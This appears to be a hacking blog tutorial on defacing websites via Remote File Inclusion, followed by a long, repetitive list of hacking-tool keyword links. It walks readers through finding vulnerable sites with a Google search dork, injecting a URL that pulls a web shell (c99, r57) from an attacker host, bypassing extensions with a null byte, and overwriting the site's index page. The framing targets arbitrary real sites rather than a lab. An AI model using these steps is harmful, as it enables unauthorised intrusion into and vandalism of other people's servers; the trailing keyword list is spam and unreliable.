HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.

RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.

As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.

inurl: "index.php?page=home"

At the place of home, you can also try some other pages like products, gallery and etc.

If you already a know RFI vulnerable website, then you don't need to find it through Google.

Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.

http://target.com/index.php?page=home

As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.

http://target.com/index.php?page=http://attacker.com/maliciousScript.txt

I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.

Now, if it's a really vulnerable website, then there would be 3 things that can happen.

1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
3. Successful execution.

As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.

Related articles

1. Game Hacking
2. Hack Tools For Games
3. Pentest Reporting Tools
4. Pentest Tools Linux
5. Hack Tools Mac
6. Pentest Recon Tools
7. Hacker Tools Apk Download
8. Hack Tools For Pc
9. Hacker
10. Hack Tools
11. Hacking Tools For Windows
12. Hackrf Tools
13. Game Hacking
14. Beginner Hacker Tools
15. Hacker
16. Hacking Tools Mac
17. Pentest Tools Url Fuzzer
18. Hack Tool Apk No Root
19. Hacker Tools 2020
20. Computer Hacker
21. Hacking Tools And Software
22. Pentest Tools Download
23. Free Pentest Tools For Windows
24. Beginner Hacker Tools
25. Hacking Tools For Pc
26. Beginner Hacker Tools
27. Hacking Tools Download
28. Nsa Hack Tools
29. Hacker Tools Apk Download
30. Pentest Tools Find Subdomains
31. Pentest Tools Port Scanner
32. What Is Hacking Tools
33. Nsa Hacker Tools
34. Pentest Tools List
35. Github Hacking Tools
36. Physical Pentest Tools
37. Hacker Tools 2020
38. Hacker Tools Software
39. Hack Tools Download
40. Hacking Tools 2020
41. Pentest Tools Windows
42. Hacking Tools For Windows Free Download
43. Hack Tools For Games
44. Hacker Tools Free Download
45. Hacker Tools Linux
46. Pentest Tools For Mac
47. Hacking Tools Usb
48. Hacker Tools Free
49. Hack Tools Github
50. Pentest Tools Free
51. Game Hacking
52. Pentest Tools Subdomain
53. Pentest Tools Kali Linux
54. Hacking Tools For Beginners
55. Hacking Tools 2020
56. Hak5 Tools
57. Pentest Tools
58. Top Pentest Tools
59. Pentest Tools Framework
60. Pentest Tools List
61. Hack Tools Github
62. Pentest Tools For Android
63. Hacking Tools
64. Hackrf Tools
65. World No 1 Hacker Software
66. Hack Apps
67. Hacking Tools Hardware
68. Hacker Tools
69. Pentest Tools Review
70. Pentest Automation Tools
71. Hacking Tools Kit
72. Hackers Toolbox
73. Hackers Toolbox
74. Hacker Tools Apk Download
75. Pentest Tools Port Scanner
76. Pentest Tools Bluekeep
77. Free Pentest Tools For Windows
78. Hacker Tools Apk
79. Bluetooth Hacking Tools Kali
80. New Hacker Tools
81. What Is Hacking Tools
82. Usb Pentest Tools
83. Nsa Hack Tools
84. Hack Apps
85. Underground Hacker Sites
86. Hacking Tools For Games
87. Top Pentest Tools
88. Pentest Tools Online
89. Hacker Tool Kit
90. Hacker Tools Free Download
91. Pentest Tools Find Subdomains
92. Hacker Hardware Tools
93. Pentest Tools Review
94. Pentest Tools Subdomain
95. Install Pentest Tools Ubuntu
96. Hackers Toolbox
97. Hack Rom Tools
98. Black Hat Hacker Tools
99. Pentest Tools Port Scanner
100. Free Pentest Tools For Windows
101. Physical Pentest Tools
102. Hacking Tools For Beginners
103. Wifi Hacker Tools For Windows
104. Nsa Hack Tools
105. Pentest Tools Review
106. What Are Hacking Tools
107. Hack Tools For Games
108. Hacking Tools Hardware
109. Pentest Tools Apk
110. Pentest Tools Nmap
111. Pentest Tools For Ubuntu
112. Hacking Tools And Software
113. New Hack Tools
114. Hacking Tools Pc
115. Beginner Hacker Tools
116. New Hacker Tools
117. Hacking App
118. Hack Tool Apk No Root
119. Physical Pentest Tools
120. Hack And Tools
121. Hacker Tools 2020
122. How To Install Pentest Tools In Ubuntu
123. Hacker Tools For Ios
124. Hacker Hardware Tools
125. Pentest Recon Tools
126. What Is Hacking Tools